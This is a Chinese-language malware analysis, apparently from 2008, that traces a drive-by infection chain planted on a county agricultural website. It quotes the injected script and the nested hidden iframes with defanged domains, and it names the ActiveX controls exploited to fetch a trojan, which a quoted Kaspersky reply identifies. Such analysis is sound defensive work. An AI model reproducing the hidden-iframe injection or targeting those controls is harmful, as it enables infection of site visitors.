某县农业网挂马Trojan-Downloader.Win32.ACVE.az等

该网首页包含代码：

/---

＜script c src=hxp://ads***.2*0*-1**0.cn/ad/ad.gif?id=o＞＜/script＞

---/

#1 hxxp://ads***.2*0*-1**0.cn/ad/ad.gif?id=o 包含代码：

/---

document.writeln("＜iframe src=hxxp:cc*caa**ass.cn//11//zz.htm width=100 height=0＞＜//iframe＞");

---/

#1.1 hxxp://cc*caa**ass.cn/11/zz.htm 包含代码：

/---

＜iframe src=hxxp://www*.h**ry**spal.cn/llbw/48.htm width=50 height=0 border=0＞＜/iframe＞

---/

#1.1.1 hxxp://www*.h**ry**spal.cn/llbw/41.htm 包含代码：

/---

＜Iframe src="hxxp://z*lw**rn*m*8.cn/a14/fxx.htm" width=100 height=0＞＜/Iframe＞

---/

#1.1.1.1 hxxp://z*lw**rn*m*8.cn/a14/fxx.htm

引用以下页面：

#1.1.1.1.1 hxxp://z*lw**rn*m*8.cn/a14/fx.htm

检测浏览器类型，如果是msie，则输出代码：

/---

＜iFrame src=ilink.html width=100 height=0＞＜/iframe＞

---/

否则输出代码：

/---

＜iframe src=flink.html width=100 height=0＞＜/iframe＞

---/

#1.1.1.1.1.1 hxxp://z*lw**rn*m*8.cn/a14/ilink.html

检测flashPlayer版本，并下载相应的文件：5.swf，i45.swf，i16.swf，i28.swf，i47.swf

#1.1.1.1.1.2 hxxp://z*lw**rn*m*8.cn/a14/flink.html

同上

#1.1.1.1.2 hxxp://z*lw**rn*m*8.cn/a14/ss.html

利用（snpvw.Snapshot Viewer Control.1）漏洞下载hxxp://www.*o*iuy*t*r*.net/new/a14.css

 

 

主　题： RE: a14.css [KLAN-12788462]

发件人： "" <newvirus@kaspersky.com> 发送时间：2008-10-21 12:46:58

Hello,

a14.css - Trojan-Downloader.Win32.ACVE.az

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

Please quote all when answering.

The answer is relevant to the latest bases from update sources.

-----------------

Regards, Vitaly Butuzov

Virus Analyst, Kaspersky Lab.

 

#1.1.1.1.3 hxxp://z*lw**rn*m*8.cn/sina.htm

/---

文件不存在

---/

#1.1.1.1.4 hxxp://z*lw**rn*m*8.cn/UU.htm

利用uusee（clsid:2CACD7BB-1C59-4BBB-8E81-6E83F82C813B）漏洞。

#1.1.1.1.4.1 hxxp://www.*o*iuy*t*r*.net/down/UU.ini

/---

文件不存在

---/

#1.1.1.1.4.2 hxxp://www.uusee.com/mini3/uusee_client_update/remark.php

卡巴斯基报为：Trojan-Downloader.JS.Agent.cgt  

#1.1.1.1.5 hxxp://z*lw**rn*m*8.cn/a14/Thunder.html

利用迅雷（clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F）漏洞下载hxxp://www.*o*iuy*t*r*.net/new/a14.css

#1.1.1.1.6 hxxp://z*lw**rn*m*8.cn/a14/GLWORLD.html

/---

文件不存在

---/

#1.1.1.1.7 hxxp://z*lw**rn*m*8.cn/a14/real.htm

利用RealPlayer（clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F）漏洞下载hxxp://www.*o*iuy*t*r*.net/new/a14.css

#1.1.1.1.8 hxxp://z*lw**rn*m*8.cn/a14/Real.html

同上。